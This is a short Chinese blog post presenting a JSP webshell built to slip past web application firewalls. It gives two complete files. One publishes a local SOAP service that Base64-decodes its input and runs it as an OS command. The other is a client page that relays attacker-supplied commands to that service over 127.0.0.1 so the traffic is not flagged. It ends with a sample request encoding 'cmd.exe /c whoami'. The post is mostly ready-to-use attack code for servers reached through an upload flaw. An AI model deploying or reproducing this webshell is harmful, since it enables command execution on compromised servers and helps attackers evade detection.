WebService版Webshell绕过WAF思路

蝶离飞
422 阅读1分钟

在发现上传漏洞等场景时,很多场景下是通信过程中被标记,从而被发现本次攻击行为.所以我们可以先在本地起一个WebService服务,然后再通过调用本地服务达到命令执行或者其它目的,因为是调用127.0.0.1的服务,所以不会被标记出来.

<%@ page language="java" contentType="text/html; charset=UTF-8"

pageEncoding="UTF-8"%>

<%@ page

import="javax.xml.ws.Endpoint,javax.jws.WebService,javax.jws.WebMethod,java.io.*,javax.script.ScriptEngineManager,java.util.Base64"%>

<%!@WebService

public class Hello {

@WebMethod

public String hello(String name) throws Exception {

name = new String(Base64.getDecoder().decode(name));

Process process = Runtime.getRuntime().exec(name.split(" "));

StringBuffer sb = new StringBuffer();

BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));

String line = "";

while((line = br.readLine()) != null){

sb.append(line);

}

return sb.toString();

}

}%>

<%

Hello h = new Hello();

Endpoint endpoint = Endpoint.publish("http://localhost:8081/aaa", h);

%>

将上面的代码保存为ws.jsp,上传后访问该页面,目标即会生成webservice服务

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<%@ page import="java.io.*,java.net.*,java.util.regex.*" %>

<%

\


URL url = new URL(request.getParameter("c"));

HttpURLConnection conn = (HttpURLConnection) url.openConnection();

conn.setDoOutput(true);

conn.setDoInput(true);

conn.setRequestMethod("POST");

conn.setRequestProperty("Content-Type", "text/xml;charset=UTF-8");

\


conn.connect();

OutputStreamWriter osw = new OutputStreamWriter(conn.getOutputStream(),"UTF-8");

osw.append(String.format("<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:jsp=\"http://jsp.apache.org/\"><soapenv:Header/><soapenv:Body><jsp:hello><arg0>%s</arg0></jsp:hello></soapenv:Body></soapenv:Envelope>",request.getParameter("cc")));

osw.flush();

osw.close();

BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream(),"UTF-8"));

String line = "";

StringBuffer sb = new StringBuffer();

while((line = br.readLine()) != null) {

sb.append(line);

}

String reg = "<return>(.*?)</return>";

Pattern p = Pattern.compile(reg);

Matcher m = p.matcher(sb.toString());

while(m.find()) {

out.println(m.group(1));

}

\


%>

再将上面的代码保存为wc.jsp,做为客户端,访问

http://localhost:8080/wc.jsp?c=http://127.0.0.1:8081/aaa&cc=Y21kLmV4ZSAvYyB3aG9hbWk=

即可成功执行命令

image.png

avatar
文章
阅读
粉丝